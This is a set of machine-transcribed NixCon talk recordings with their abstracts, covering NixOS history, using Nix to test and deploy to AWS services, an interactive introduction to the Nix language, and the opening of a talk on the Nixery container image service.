2007 or so. There were a few people already using it before, but I think that mostly some of the Haskell people at the university, they started to get into it and probably spread the word. Yeah, it's all in the Git logs. So I don't remember these things because they're in the logs. So as soon as they started using it, they started contributing so that we can find out how it actually went. I was wondering if you can recall anything from your thesis defense? Like were there any intros? So it was not a PhD thesis, but it was just a master thesis. So I remember basically them saying that it was good enough. That was a good moment. So no, actually, so there was just a few people there, like Supervisor, Ilco and a bunch of others. So no external people. So no, I don't really recall anything. Uh-oh. Well, first of all, can I mention that the thesis defense was one week before the 10-year deadline that you had to reach and then had to not have to pay back your entire student tuition fee? Okay, so a little bit of history about that. So when we started, we actually got student loans and the period to finish it was 10 years. And I finished it in nine years and 51 days. 51 weeks. Sorry, 51 weeks. So I had one week left. And the other thing is that you were wearing a sick of it all t-shirt. That was the right one. Yeah. But that was just coincidence because no. That was not an honest, that was, no. I was wearing that, I think, but that wasn't a conscious decision. It's just a band, you know. Hey, what did Nix's configuration look like before Model System was introduced? What did it look like? Configuration came later. I like that answer. Yeah, so basically it was very bare bones, just what you saw. That was it. That is what it was like in the early beginning, just finding the right paths in the store and then just doing some stuff. So it was really just a proof of concept. This was some really cool masters and PhD theses that you had over there. Are there any other theses from your department that you remember that are interesting in some way to you personally? So you actually expected me to have read those theses? So no, no, so I wasn't into that. I was just glad that I had finished everything. I probably wasn't the right person to have an academic career. Have you had anything interesting in the lower level like unicannel space with people? I only had HLVM Galois thing works with Nix, but have you had anything else in that space? You will have to repeat that question. Unicannels. Unicernels. That was the question. So don't the only thing that I actually focused on was just getting Linux to work. So that is all I ever tried. Did you consider making it with FreeBSD instead? No. Not fanboy enough. So why not? I already had done it for Linux and I think that with FreeBSD the whole kernel and user space was much more tightly integrated. So it would have been a lot more difficult. With Linux, things were much more componentized. So that would actually have been easier. Sometimes when packaging packages for Nix packages, we have some questions about licensing, what we can include, how we can link and so on. Would you be willing to help answer those questions? So we have another week, right? So of course I'm not a lawyer, so I can actually not give legal advice, especially in certain jurisdictions I'm not allowed to do that. But I do have thoughts about them. That is as far as I can go. But yeah, so licensing and Nix packages, that's something that could be improved. Let me just say that. I think that there's a lot of stuff that can be improved there. So if anyone is interested in tackling that problem, I would be more than happy to help. All right, so did anyone manage to package it? No one? Really? So I will be here all afternoon. So if you just have packaged it by then, then you can just come and pick it up. So if there are no more questions, I'd like to thank you for your time and attention.
NixOS hasn't always been there, but it was created by a small team 15 years ago. In this talk you will learn how NixOS got started (and what came before), why certain design decisions that are still in NixOS today were made, and perhaps see an embarassing picture or two.
10.5446/50694 (DOI)
So the next talk is from Nikola Matjep and he's going to be talking about testing for and deploying to AWS environments. Thank you. Hi everyone again. So I learned an important life lesson at Nixcon this year. If you're going to a conference and aim at giving a talk it's a good idea but aim at only one. The consequences this one's gonna be much shorter so feel free to interrupt, ask questions during the talk, share your experience and hopefully we'll make it to half an hour. So I did during most of my career I had someone dealing with the deployment for me and I didn't have to care about it at all until I started this side project called TechDecgo which is a presentation software and then all of a sudden I was alone to do my deployment. I had to actually deal with a setting up Postgres and everything and I had to learn about it. So really liking Nix I tried to push as much of the complexity inside of Nix and I didn't really want to use Docker based software for building, for deploying. Thank you very much. And yeah so this is the story of my journey working or making Nix work for AWS. So first a bit about TechDecgo which is the presentation software that I'm actually using today. So the front end is web components and TypeScript. Web components is a new standard in the W3C for basically creating new HTML tags that have some JavaScript logic in them. I have no idea what it actually works. So this is not my job. My job is the rest, the back end. So the back end was entirely written in Hasco and for deployment and the build we use Nix and actual pushing the artifacts starting these three servers it's all terraformed. I never quite understood NixOps so no NixOps there. From AWS we're using AWS Lambda which is basically you push some codes and you run somewhere you don't have to create a machine you don't have to set anything up it's just your code is there and whenever there's a request arriving it's being run. S3 for storing presentations, SQS which is a queue service from Amazon that we use for different lambdas to talk with each other. DynamoDB for we actually got rid of that but at the beginning we used it and a setup in Nix is kind of interesting so we decided to share it and RDS which is the relational database service of Amazon. So if you want to check out DegDego it's fully open source, some GitHub, Dego slash DegDego. It's a whole bunch of JavaScript so that might be a bit scary but there's some Hasco and some Nix. All the code I'm going to show during the presentation can be found in this directory here. So feel free to have a look. Now as I said I didn't have much time to prepare this talk so I'm missing one slide which is the last one and it's actually quite convenient because I can show you how DegDego works. You have a set of templates you can select one. I'm gonna have a last. Thank you. No. And there you go. So the first part is gonna be the actual lambda part. So I have this Haskell code and this Haskell code needs to run somewhere in DWS and for this lambda is great because lambda is really just this abstraction. You don't have to start the server, you don't have to stop it. The problem is that when you build stuff in Nix most of the time you need a Nix store or if you use Nix OS it's very simple just copy the closures activate and that's it. On lambda you have very limited size I think the what you push through WS can only be 50 megabytes so you can't fit in there in Nix store most of the time. You can't have the GHC closure with it. So the answer here is to use fully static Haskell executables where there's no dynamic linking at all. You don't even have an interpreter bundled in your executable and there's one guy here Niklas where is he over there. Big applause for him who made amazing work on getting these to work. It's kind of a very nice project because it's Nix and yet it allows projects to live outside of the Nix store. So you have these standalone artifacts and it's using cache x so it's really a lot of the community coming together and this one there's a funding page somewhere you can find it on the GitHub projects and h2-statics Haskell Nix and so feel free to chip in there. Now so we build these Haskell executables and we just put them in a zip file and a zip file is sent to AWS and just works. The actual upload is done with Terraform. So how does this static Haskell Nix work in practice? Most of you do Haskell here and this is using the legacy Haskell platform, not a new Haskell and I just want to show you how it works or how you can make your any executable static pretty much any. So this static Haskell Nix thing is basically just where the Nix classes project is and there's a survey directory which you can just import passing it your normal packages. In this case my normal packages are just Nix packages with some overlays adding Degdegos custom packages and then this is crazy because line 16 you can see you just do survey dot packages with static Haskell binaries dot Haskell packages and there you go. You have your Haskell packages that actually compile to static fully static executables. This is beautiful and then when you create your lambda you just copy an executable for instance this one. There are a few bugs right so might might break at times. Just copy the executable zip it up and that's it. Any questions on this? Great. And then the next question is okay we have some stuff that's being built with Nix but how do we teach Terraform to reuse that? And on the left there's a weird thing so this function handler path path equals builtin seek something and then the function dot zip. The idea is that Terraform has this data external resource or it's not a resource sexual data where you can tell it hey Terraform just run this command and you can expect this command to output JSON and then you can use this JSON in Terraform as well. So line 3 to 9 this part here are just the lambda description and the file name is the zip file that's expected by AWS and here this file name refers to data external build function use of path which is defined line 12 to 19 and most of the time in Terraform you have to say oh Terraform please recreate this resource if the file hash has changed for instance or if the time of the day is later than something like that so we have weird ways of making sure that Terraform notices when your code changes and next it's not a problem because the entire file name is going to change whenever you change code. So how this work is that we do a Nix evil is basically going to evaluate something and tell Nix to actually print the output as JSON. This is very very cool very convenient because you don't have to have any other commands that you run just call Nix output JSON and that's it. The weird part which is here so this is just to make sure that your function is actually being built it's like a deep seek because this is just an evil right Nix will try not to do any build and this one will give you a path back but the path might not exist yet so you just do a bit of a dirty trick here to make sure it's basically import from derivation to make sure that the thing exists. Now I'm going to go into the AWS services themselves so lambda for any the code and now we'll talk about S3 and the rest. So the talk is deploying to AWS but also testing for AWS. So I think this is the interesting part because when you ship some code you deploy you don't want to run you don't always want to run a staging environment where you run your integration tests. So what we're going to do here is just for each and every AWS service we're going to try and find either an open source alternative or some jars provided about AWS some form that we can execute the services locally inside our Nix build and then we just redirect the URLs during the tests the local servers and we'll repeat for the next service. So we're going to do this for a few services. First one is S3 so you probably all came across Minio who's seen it before. Okay so Minio is an open source clone of AWS S3. It has its own protocol but it also speaks S3 protocol and it's a nice project, works for my use case which is testing. I heard people say that it was working great if you use it as a full replacement in production. I heard some people say that it wasn't that great if you used it as a full replacement production so it depends a lot but for testing it was just fine. And how this looks is very simple you add Minio as an input to your derivation, you set some dummy environment variables because it requires them and you start the server. You say localhost 9000 for the port, give it a temporary directory where you can actually store it such artifacts and that's it. It's running and you run your integration tests. The last thing you need to do is actually tell your code to use localhost as opposed to canonical AWS URL. In the case of Haskell I'm using Amazonka and you can give your own HTTP manager to Amazonka and just tell it hey listen if you see S3 Amazon AWS.com well just redirect your local one disable HTTPS and that works. Make sure to only use that during your tests and not in production of course. Next one oh questions about S3. All right next one is the simple queue service so this is just for sending messages between lambdas using AWS. It's an AWS project, works fine in their server but for this one they they don't provide artifacts or they don't provide a way of running it locally unless you use Docker. But there is an alternative one which is elastic MQ very much like Minio it's an open source clone but it speaks the SQS protocol. So what we do is that we just grab the artifacts that they release in GitHub it's a jar we just Java it and it runs so I feel a bit dirty inside we're starting Java in my laptop but as long as I don't have to start Docker right. Wash, rinse, repeat just as we did for S3 replace the hosts replace the port, disable SSL and we're good to go. DynamoDB who's here has heard of it yeah for the others it's basically like Redis it's a very simple table format database and on this one AWS is actually pretty cool because they do provide ways of running it locally you can download the jar which you can just start on your laptop. By the way all these services even though they use network they never require anything like sudo or so that means that everything can just train derivation it's actually very nice to have your tests running fully sandboxed if someone else new company has run the test before they're going to be cached in your shared cache if you have one you don't even have to run the test yourself. So you just grab any of those star balls, UN packets, in your derivation and you just say okay Java start you have some options to set the ports and after that your integration tests and you don't forget to tell Amazonka to use your local version of DynamoDB. Questions for this one? Great. Now what about postgres? So postgres is actually interesting because the exact same postgres or mostly the same postgres is going to be running on AWS and for many many years in my life I thought okay I have tests that run postgres so that means I need to install postgres on my laptop I need to install it through Ubuntu or a service in XOS but you really don't have to do that and this was a Eureka moment for me. Postgres can use any kind of directory and it runs as a background process if you want to but doesn't have to be a system-wide background process that means that you can even start postgres in your next shell we can start postgres inside a derivation and just get it at the end and you don't have to tamper with your system-wide postgres. So you just tell postgres hey just initialize the database in PG data this is just a name I give it you have some configuration to set but that's that's about it they tell it all right start and from there on you have postgres started you just make sure that before you do anything else you give it enough time then you create the databases you gonna need for your tests and that's it run your tests at the end you say all right immediate stop and no traces left of postgres in your system. Everything clear here? The really cool part about that is that so all these services are provided through NICs and they can be started and stopped at will. All these services so far have used temporary directories so they're not gonna write anywhere else than in your temporary directory folder. So you can go one step further with this is say well I'm gonna have a shell wrapper that's actually gonna start my services whenever I develop locally so if I don't want to do a full NICs build for my thing maybe I have I'm using GHCI for development but I still need the services to be there. This is something I find very very very valuable is to have those small shell wrappers that gets initiated in a shell hook and just creates a few functions that you can call from your shell from your command line. So here I have one oh is it big enough? Say something! Sorry? So this one is for loading postgres very simple and this is where the heavy lifting happens. This function is store services in terms of UX. If you have coworkers that don't reuse NICs or don't know about NICs they don't want to set anything up you just tell them well enter the NIC shell and when you want to start your services or when you want to run your tests just call store services. It's gonna load postgres, it's gonna start SQS as well, it's gonna start S3 and then anything that happens after that is gonna have access to all these services. And when they're done they just call stop services and everyone's gonna thank you for this because most companies now still do okay you want to run the tests all you need postgres just do sudo apt install postgres and with this no need for that people don't even need to know that postgres exists. You might want to add a few things like a few repos that set environment variables. Here we actually need our tests to use some JavaScript build stuff so set environment variable where there's some build JavaScript that was built by NICs. If you forget how you actually did the packaging you don't have to worry about it. I'm using this once a month we started working in April I think one day I packaged it and now I don't have to worry about it anymore I actually forgot how it works and that's it. Thank you for listening. Do you have any questions or experience reports that you want to share? So are you aware of NICs OS testing suite when it spawns QMU machine and you can use actually NICs description language to start the services inside and if yes why didn't you use it? So first of all I'm not using NICs OS in productions right so for a NICs OS test means I would have to set to create a new NICs OS module with my code and then ship that into a full NICs build. The other problem is that NICs OS tests only run on Linux as far as I know they could run on Darwin for instance but no. So I'm using Linux but the friend I'm working with on this one uses Darwin so I wasn't really an option and also it doesn't allow you to do the local development right if I use GHCI to test my code I also have unit tests unit tests that run again Postgres so in that case that would mean okay I'm in GHCI I make a change then I close GHCI I do NICs build then it has to build everything actually rebuild from scratch the whole library in the Askel library and then start the tests it would take probably a minute for everything to happen. Whereas if I just do if I just start Postgres in the background or anything like that I just do colon error reload GHCI main runs the test and I'm good. It's a recent cycle is about five seconds. Yeah. Did you look at terror test? At? Terror test. Terror test no what is it? It's a framework wrapped around Terraform to do integration testing so it spins up components runs a test cycle and destroys those components it's a little bit like in spec and server spec but bikes with support for Terraform. Very nice. So this is also something that takes some time to run right but this is I didn't know about this and this is great. It has some overlap. Thank you very much. I also wanted to make another tooling suggestion which is a TerraNICs I don't know if the TerraNICs author is here today but it's a really cool way to write Terraform the syntax in NICs instead and it does away with all the horrors you have to go through when you realize that the Terraform language itself can't do all kinds of stuff you can write it in NICs instead and I find it very convenient so that might also be something that's useful. Yeah although if the goal is read to hide NICs from your coworkers that I don't hate you this is a bad move. I have a question. Do developers use these services started from NIC shell for local development or only for test running? You mean these? Yes. Yeah so in this project I'm the only Haskell developer so I'm the only one using the REPL things for instance but whenever I work at a company basically whenever I work I write these and people like using them because it makes their life much much simpler. Okay I have questions then what do you do with frontend? Is it started like this or do the developers don't run frontend locally? I don't do frontend. I let them deal with their mess. So I don't know they use everything except frontend right? Yeah exactly so they use webpack and whatever to use so I have no idea how it works so I'm not even attempting at helping at all. Sorry. Oh no that's not true. No no I've done it before for a different company but it was very tricky to get right because most of the time their editors are very tightly integrated with the build system and so it just breaks everything for their editors which is a common theme in many languages actually. Alright thank you very much for listening. Those need to find me a dn. Oh no that was a clap. Great. Bye.
This is an overview of the setup we used when building DeckDeckGo. We used Nix to test and deploy code to AWS Lambda, backed by Amazon's Simple Queue Service, DynamoDB, S3 and RDS PostgreSQL.
10.5446/50695 (DOI)
I didn't really advertise this track heavily, so I'm surprised that there's so many people and I'm also delighted. Maybe we should start with just a quick... So this is more of an interactive session. The goal is for you to learn how to use X and kind of go over all of the aspects because it can be a bit difficult, right? So maybe we can start with a quick round of... Maybe who knows how to read the next code? Maybe raise your hand. Okay, so half of the room. Who knows how to create a new package in the next packages? Yeah, let's test. So, yeah, today we're going to cover these things like how to... So the first doc is how to read next code, so it doesn't look the weirdest anymore. And then we're going to cover how Nix works in the internals, how to build your own packages. And you should... If there's something that's unclear, you should interrupt us, and then we can just go over it right. Okay, let's get started. So, reading the next expression language. So Nix is an ecosystem, and that's just a small part of it, which is the language Nix, and then we're going to see other parts of the ecosystem. So a long time ago, like three years, which is 30 years in a completely different time, I was starting Nix and I was seeing things like this, right? Or like this, and like this. And just what I did is I banged my head against and I tried until it works. And so the goal of this doc is that you don't have to do this, and maybe after the end of this doc you will be able to just read the code, and it makes sense. Okay, so what is the next language? Next language is basically you have JSON-like values. So it translates actually quite well to JSON data types. So for example, the string is the same representation, number is the same. The list is already a bit different because we don't have commands between items. And to create an object like you have key equal value, and then you need a semicolon to end the expression. Now it is null and true-forces true-forces. So that's the JSON things. And if we put them together, it looks a bit like this. Okay, so strings have more constructions or a deterred representation. You can also have multiline strings. And so one of the things that you need to know about the multiline strings is, Nix is going to remove this part of the string for you. So you can actually align your literature and your codes. And if you have indents and Nix is going to do the right thing and remove everything that's in front. If you push this a bit further, then it's not going to remove this. It's just going to remove the smallest part of the white spaces. And then finally we have an event-like representation. So you can just type your S. But this part is going to be thinking of duplicating it, by I'm just mentioning it here, complacency. Okay, so that strings. There is another type that's called the path. That's not in the JSON data types. And that allows you to reference files directly. So there's multiple notifications. There's one that's just you type a relative path. And that's going to be reserved to an absolute path relative to the file where it's being loaded. So it's easy to think about it. Then you can use absolute paths. And it also completes with tids based on your home directory. And then the last one, which you probably are going to only see with Nix packages, is this where the bracket addition. This is actually a look into the Nix path environment rival. So I mean I'm just mentioning it's for now. You just need to know that this is going to reserve to a path. And if you want to know how, like what path is going to be, you have to look at the Nix path environment rival. And then there's a key equal value. So you can see Nix packages are on the right here. So I have my own Nix packages checkouts. So I just want it to my get report. All right. So now we have only values for now. So now we introduce functions. So Nix functions are just methods. So here, for example, you have one function. Each function has one argument. And it returns another function with one argument. And then that's the body of the function. So here we bind the value to A, we bind the value to B. And in terms of scoping, this creates a new scope. The scope is only below the function. So you don't produce, you can never go, like you can do like JavaScript where you declare a Bible. And then that's going to go below the right. And then there's another representation which is a keyword argument. So again, that's one function with one argument. But this is going to be a bit like pattern matched or you pass an attribute set like an object. And it's going to extract the keys from the object and bind them into your scope. So that's two ways of writing it. The most popular one is this one. And we're going to see more examples after. So here that's the simple way. But then if you pass, for example, an object that has A, B, and C, here it's going to fail the evaluation because it's going to complain that C is not the third in here. So this, another, you can do more things with this. For example, you can specify default values. You can say, I don't care about any extra arguments. So that's going to be a guard. And you can also bind the original attributes that's been passed to the function to an A or B variable. Okay, so now we have, so now we can build just values, a bit of functions. And now we start looking into some of the bit and functions. So these are functions provided by the interpreter and there are kind of existing functions in the environment. So you have two string boards. About two string, the next, there's no conversion, automatic conversion. You have to specify if you want to convert from one type to another, except in one day. I won't talk about it. You can import a file. So what you can do is you can say import another next file and it's going to be evaluated. And then with the value from this evaluation is returns to your current scope. You can do exceptions to this, you know, like functional type things like map and fold and functions like that. So these are all top level. And then we have another attributes, which is scriptings. And then in value find more functions. So there's a trace that I do you to just print out things for debugging. That's kind of from it. From JSON to JSON. And there's many more, but I'm not going to occur with them right now. Okay. And keywords. There's a few keywords on top of that and then we're going to finish with the membership. So the let's binding allows you to bind the values to names. And so here we actually create a new scope where we bind hello and packages into the scope. And then they're available below. So you can access that. One thing to note here. You might notice the we access packages here because the names are bound at the same time. So you can do things like you don't care about the ordering of the let's finding basically. And because next is a lazy language, you if you never access one of these values, they're never been a big. Rec is a bit of the same. So if you have an attribute set and you add the record, what it's going to do is the same. Like it's going to bind all of these keys as a variable. So sometimes you see a record and you're wondering why that is. It's just because it finds the values into the scope. And it's available so below like here you can see the version. With is another keyword that imports all of the values of the attribute that you pass into the scope. This one is a bit dangerous like in most languages where you have this keyword like here we do with packages and then magically it's not very explicit. Like you have these variables that are there. Excuse me. What is the difference between with and import? Okay. Good question. I need to start the next. So imports allows you to do things like here you get that's the value of the file and then you can bind it to. That's the environment. Whereas the with keyword is going to be with and then here you say with a equal to 4 a. That's because you're a value. So you only take some part of the packages not all of them and bind them. Imports allows you to load a product from somewhere else. The with is just a way of importing the existing attributes into keys into your scope. Only some of them. All of them. All of them. Import like with is a different construct is import is to load a new file into your scope. And with is a way to deconstruct an attribute into different environments. Does that make sense? Yeah. Thanks. So here, packages for example has been imported somewhere before and now we just create the scope and then these are viable. Not magically but they're kind of not. They're implicit. There's another tool keyword was in her and that is short hand to basically instead of writing GCC what it is the GCC can say in her from packages. And so it's just a way to reduce some repetition. And you can also use it that way when you inherit the value so you don't repeat like packages packages. So you make a typo it's like you the main advantages you avoid making typos. If the net is passive and assert this allows you to add another expression just before. So you have your code without assert and you can insert the search just here. So that's when you're debugging you want to make some assumption and verify them you add an assert and you say because the next error messages are not super clear always. So what you do is you sprinkle some asserts in your code and you like okay I think this should be a she could set it or something and then you get a better feedback. All right. Yeah, we're almost there. Now we have orders. There's a way of constructing objects that is shorter than it's Jason. So you don't need to you can create a deep hierarchy with just adding the dots in between. So we should do 5% slash device. For this value it actually brings actually I should show you directly. So now we have a that's so now I have a deep project with a that five systems. That's the device in here. Okay, there's another keyword that's or which allows you to test if this attribute exists. Then it's going to return this if it doesn't exist. Then you return this alternative value. And finally you have this test operator that allows you to test just returns a true force if the key exists in the. The few bullet approaches like classic string interpolation. So that's where conversion is done automatically on some cases where it comes to string. But not always. So here for example we access this we get the string and we build this string object from this value. There's a merge operator for each of its sets. It's a flat so it doesn't do a deep merge. Just good to know. Excuse me. It's like you have a out. I forgot to say so. In you when you read the next code in expectations for example you you see and that's confusing this. You see the dollar with this and then without the brackets right. So this one is on the next language level. So that is the interpolation. And then this is later on used in the builder phase in the bit phase which we're going to cover later. But this is just a bash viability. Yeah. And so they look the same but they're actually on use that different moments. Because in this you have the evolution that happens and you produce derivations and then you build the derivation. So you have a full life cycle. We're going to cover it. Yeah. Like number operators. So that's it for the language. So do I have a volunteer to read based on everything I said you should be able. Good. All right. So come over here. It's more than I did. So the first time is the definition of function right. Yes. We have two arguments. Standard deaf and then that URL. Then we have a body of function. Which says that we want to. I don't understand this part. I know that this is the definition of some data. But I don't see a sign. So what does mean. So this is an attribute sets. And we access this value. Yes. Which turns out it's a function. Oh OK. And then we pass this. All of this. The whole object is already record. We pass the record. OK. And in the record we have values and attributes and values. Also one attribute is generated by a function that was passed with the argument. And this takes also something. This is an attribute set. What is the difference between the rack and the attribute set. Great. So this attribute set is normal. This one has this right word that adds all of these keys to your scope. So this means that for example. The scope of the function. Which scope. So it gets a new scope that inherits from the barn scope. So here we have a new scope. Which contains it's then then F. Now when we enter here. We have a new scope that inherits from this. So it's still not as accessible as. First it adds all these values. And this one has no bar scope right. It doesn't incur. OK. So it has separate. We need a P name over here. We need the version over here. So it has a scope of the barn. It's always recursive to scope. Yeah recursive. It probably does like it wanted to mean. So this one only has a bar and this one has a parent and parent of the parent. Right. You can refer to the keys of that object itself. Right. You can even like you can refer to like name this game like other key. That's what it is. It's like that recursive. It's not a key word. Record box. It's recursive. Yeah I guess so. Yeah sure. Yeah it's recursive. I still doesn't understand. So this one is using keys from the parent. Yeah. And this one is also using keys from the parent. So what is the difference. So when you type right you create a new scope. And here we have no new scope. It's the same. It's always the scope is always inherited. But then you can extend the scope with new. I understand. I understand. So this one is sending those keys. They are using the scope of the where they are initialized. Every question may need to clarify. If I were to use your URL key within that attribute set I wouldn't be able unless I could try before the attribute set. You don't try. Yes. So what you're asking is if I need the URL maybe in another key in here within that attribute set then you would have to write the right. Okay. So that's what right does basically. Yes. Okay. Now on the set right it's recursive. Okay. Me too. Thank you. So this could still work if we wouldn't use the recursive back on the third line. No. If you remove this. Yeah. Then PNIM and version are not added to the scope. And then we wouldn't be able to use the. So it would never get it's here and then. Okay. But you can you can also so here we use it below but you can also use it over here. Okay. So the next slide is we assign the attribute out through then we have another attribute that is called meta and it says generating the another attribute set but with the with with leap attributes right. It's come from the leap. Yes. So we can hear inside we can use attribute from leap. Yeah. Okay. So this one has access to without having to use the namespace right because with namespace we would also access this right. If I use something here as the that the flip dot license it will work right. Yes. Okay. So with with we have the short hand notation. Yes. And then this generator is the whole thing for that. Yes. Thank you. Yeah. Thanks. So I have a question. What's the. So basically the body is what we call by the function. Oh yeah. Is the result of the function. Okay. So the third file is a function right. Okay. And if you import this you get a function. Okay. And if I call it with an attribute set with those two keys. Yeah. It will return another attribute set. Oh no. It will return the result of invoking just make derivation derivation function. Yes. Okay. That takes another attribute set. Yeah. Okay. Cool. That's how we do things. Yes. Should we do another one? Yeah. Yeah. Anyone else here for this one? It's shorter. Yeah. Okay. Nice. A brief sound. Is it? So this is a generator dot next. This is Nick's stuff. Not the next package manager. Yeah. Okay. You import config and packages and your hardware configuration X is another bit of Nix code that you're reporting into this file. So this is a function. Yeah. Yeah. Okay. So this is a configuration dot next. This is Nick's stuff. Not the next package manager. Yeah. I'm completely new to this. I'm just busking this. Okay. You just need to read the next one. Okay. You import config and packages and your hardware configuration X is another bit of Nix code that you're reporting into this. Okay. So yeah, basically you're, again, you're creating a new file with a function of the dot. Yeah. But this time we ignore extra parameters. Yeah. You can change the question. So the idea of ignoring those parameters is to make sure that whatever we pass as a attribute set will work as long as it has a config and packages. All right. And we don't care about the other one. Yeah. Okay. So and sometimes you want to be strict and be explicit about older arguments. Okay. Sometimes it's going to be more less. So yeah, we have this attribute set and then we assign to this key the function of the configuration. So yeah, so the contents of hardware configuration Nix becomes all the definitions in there become part of this. That's it. Yeah. All the. So now you're going to be going a bit too fast. Okay. Right now we're just reading the next one. Okay. So we're thinking about whether it's going to produce in terms of Nix values and Nix values. Okay. Yeah, the end result is going to be that you include this one. Yes. Is it? Because in specifying there, isn't it just a path? Yeah. So right now, exactly. So right now, all we do is we actually assign this array that contains a path. That's it. Like it's just a path for now. And we assign this, this attributes. Why not just using the input function from the file? Yes. Yes, you could. But that's more how Nix is configured. What we do under the hood is we're going to import it, but we'll get your. So we have functional config and package. Where do we use those? Attributes or variables or whatever. I don't actually, I could remove them actually. And how do you, so here we have like services. SSHP and input. How do we know where they exist on this code? Yeah, for now, we don't know. All we do is we built this big tree of config. So it's like attributes. Boobs that's new attributes that's it. We create the tree and we assign these values. That's it. And then in another talk, we're going to talk about how all of this gets together. All the things. Yeah. Thank you. I maybe it'll show. Because that one thing I found very confusing is how I don't really understand. I can still that how tables, tables works in Nix because like obviously that is like we use import, but it's not like the keyboard. So it's like the keyboard is doing the import, right? So how does it work? I'll kind of input this into the front. So you can have overwrite it, right? Yeah, well, yeah, but I don't think you can name it import, right? Or not? Or is it import? It's like sort of like thing, but this is the right way of the function kind of go. So the keywords are. So you have a bunch of different functions, which are basically by default you have a scope with all of these functions available. Then the keywords are more in the like the parsing section of the when you pass the next code that's going to use these. Yeah, so import is the word. Yeah, it's a function. It's a function. It's a function. It's an important function. It's important function. Okay, this import is still function, so I can define my own import in my scope will be like that import which I will break everything under. Can you go back to this sample? Yeah. So the important thing to see here is this is not import. Import is a function, but this is imports. Yeah, yeah. Oh, sorry. Yeah, so this imports, NICS doesn't know what imports means. And so we're not overloading anything in NICS. We're just making an attribute set with a list of. Yeah, but it reminds me of the word, right? So we're going to name it to import and then assign the array to import. It will still be function in our scope, right? It will be just an array. Yeah, I guess you can shadow. You can shadow. Yeah, shadowing. You can do shadowing of existing variables with new variables, but only below. Yeah, yeah, in scope. But I don't want to confuse you with the recursion because it records because sometimes you have like what? You have like same attribute and you're like what? Why is it different? Like shadowing. Yeah, I agree. The leds binding and the spec and the width cannot play similar roles. So that's more of when you start writing NICS, you're going when it's appropriate to use one. Yeah, when you're going by. Yeah. I think the main problem, I'm a procedural guy, so I'm a C-Pro guy. So I've got to get my head around functional way of thinking. Yeah. And that's the main kind of Everest mountain thing. So you get out of the functional curve or a straight forward, but you travel back. And it always makes more sense. Yeah, so yeah, you never muted anything, right? You only change when you do operations, you're only return new values from that. All right, so I guess so we code NICS is a functional language. It's lazy and it's pure. I just want to go over that quickly. So functional is this approach where you don't mutate anything like we're talking about. And you only have functions to do operations. Lazy is because NICS only does the operation when you access something. So you can have a whole tree of operations somewhere. If you don't touch it, it's not going to evaluate it. So it's not like a scripting language where in your heads when you read the NICS code, it's not like, it's not interactive where you do like, does this thing, then it does this thing, then it does this thing. It's only when you access the values that it's going to evaluate the whole thing. Which is a bit similar to my question. Maybe I can demonstrate more about this later. And then finally it's pure. From everything I showed, we are not writing anything to this. We're only reading things. So there's no side effects. For now, all you can do from what I explained is maybe put a bunch of values together and then produce a JSON of the NICS. Isn't working a file from a file system not like your operation? It is, but it's pure in the sense that you don't modify anything. As long as you only read, it's fine. You're like an observer. What happens if the file is not there? It's a throw an exception. You get errors, they just can happen. It's how you are, while in a shell script. So the nice thing is if it fails, it fails consistently. So when you compile the files. So that's the next talk is about. So right now, all we're doing is we're taking a bunch of values and putting them together. So that's the thing that are missing topics. The big missing topic is the derivation. Because that's where all the computation and the bits happen. We're going to talk about this next. So we have a pure scripting function, a pure and functional scripting image. Hopefully now when you see the next code, it's not just like, oh, what is this thing? You can actually follow through and then from that, maybe you can keep, like, it makes you more independent. Thanks. I wonder if it might be interesting to, on that configuration.nix, to sort of unpack it so it's building each, actually set individually. Like you're using unit compact nested syntax. What might be interesting to show the more verbose version? Okay. I guess I can show. So we have the configuration of next here. So what should we do? I'm just going to modify it for now and remove it. But it's not a function because we established that we don't need any of the arguments in the way. And now there's a to code mix and sentiate that allows you to actually read the next code. And you say dash dash eval. And that returns the values. But right now you can see it's lazy because it just returns the first step, but it didn't try to ever get all of the rest because we didn't access it. So we can say actually, please be straight. And now it returns the whole thing. So it's not really readable. So I'm just going to generate JSON instead. And a bit of thank you. And now we have the web structure. So on the left. So that's what we have on the left. And here, oh. So the path is not a recent value. So it's the point. There's no such problem, right? Yeah. No. Yeah, maybe it's. There's no such problem. There's an error there. So we have the file. Oh, you're right. So if I touch this. That's more than I get. So here we're starting to see a bit that does magic. Oh. What's that? So what it does is when it accesses a file, it imports it into the next store. And that's the value of the. And there's a hash here. We're going to cover that later. But if you change the configuration file, it changes the hash. This is for version 5. For version. For version. Yeah. Yeah. And another thing to notice is that the keys are ordered. And that's a property that we want to have because it's basically we want to be more repeatable. So we need to do things like ordering things. So you always get the same result. All right. It's something we can count on that the keys will be ordered on a. On a validation. He's our order. All the same. Right. I think that's enough for now. We'll take a small break and then I can go ahead.
Nix is not a big language but the syntax is quite foreign to the usual language suspects. The goal of this talk is to demystify the language. At the end all the viewers should are able to read Nix code and start wielding Nix's super powers.
10.5446/50697 (DOI)
I actually didn't count. Hi. Right. I'm going to be doing a little bit of dual microphoneing. I've noticed kind of throughout the course of the conference that very few people are doing demos. So I'm a little bit afraid that the demo gods might actually be striking down all of their vengeance upon me today because I have four. So we'll see how that goes. Right. Hello, everyone. My name is Vincent. I think I know probably half the people in the room already. Test one, two, three. Okay. It's a good start. Right. Let's do it this way. My name is Vincent. I think I know about half of the people in this room. Test gen is my username. That's probably the name by which people know me better than my real name. So yeah. It's the same username on GitHub, Twitter, IOC, whatever. So that's how you can reach out to me. Cool. So I'm here to talk to you about Nixery, my fresh and healthy way of building container images. And to kind of kick that off, I want to give you a little bit of an overview over what the container ecosystem looks like at the moment on a very high level. So quick show of hands. Who has never used Docker or anything like it? Okay. Very few people. Cool. I'm not going to go into what containers are and so on, but I'll say a little bit about how the tooling works because that's kind of all the background that you're going to need. So Docker has a concept of images that are basically like root file systems of a distribution that are made up of a bunch of different tar balls called layers that are distributed over a registry protocol. The details of how this works under the hood don't really matter. But the important thing is that there are different layers that get merged together. So if you have a sequential list of tar balls that contain non-overlapping paths, then they will be squashed into one file system. If you have overlapping paths, then the ones from the latter ones in the order of the image manifest appearance are the ones that take precedence. So this syntax over here is what's called a Docker file. This is the default method of building Docker images. You specify the base image that you have at the top, which in this case is Ubuntu, and then you run individual commands. And there's a bunch of additional instructions such as N which sets environment variables and so on. What happens when you execute this is that Docker goes and it takes every single instruction in this Docker file and it executes it and it takes the resulting diff of file systems and turns it into a layer. What this means is that this is inherently extremely stateful because there is no care taken to make sure that things like timestamps on files are in any way normalized. So things that we deal with in Nix on a very fundamental level just kind of don't exist conceptually in this world. So I actually took this particular Docker file and I ran it twice earlier today. And here are the hashes resulting from the two image builds. As you can see they have 